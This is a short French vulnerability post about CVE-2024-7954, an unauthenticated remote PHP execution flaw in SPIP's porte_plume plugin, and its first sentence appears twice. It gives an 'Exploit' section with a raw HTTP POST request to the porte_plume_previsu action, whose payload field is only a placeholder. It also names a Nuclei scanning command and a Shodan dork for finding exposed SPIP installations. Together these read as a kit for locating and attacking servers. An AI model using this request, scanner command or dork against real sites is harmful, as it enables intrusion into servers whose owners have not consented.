
Le plugin porte_plume utilisé par SPIP avant les versions 4.30-alpha2, 4.2.13 et 4.1.16 est vulnérable à une exécution de code arbitraire. Un attaquant distant et non authentifié peut exécuter du PHP arbitraire en tant qu'utilisateur SPIP en envoyant une requête HTTP spécialement conçue. (CRITIQUE)
Le plugin porte_plume utilisé par SPIP avant les versions 4.30-alpha2, 4.2.13 et 4.1.16 est vulnérable à une exécution de code arbitraire. Un attaquant distant non authentifié peut exécuter du PHP arbitraire en tant qu'utilisateur SPIP en envoyant une requête HTTP malveillante. (CRITIQUE)
Exploit:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
data=AA_[->URL]_BB
Outil utilisé:
Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml
Shodan Dork:
app="SPIP"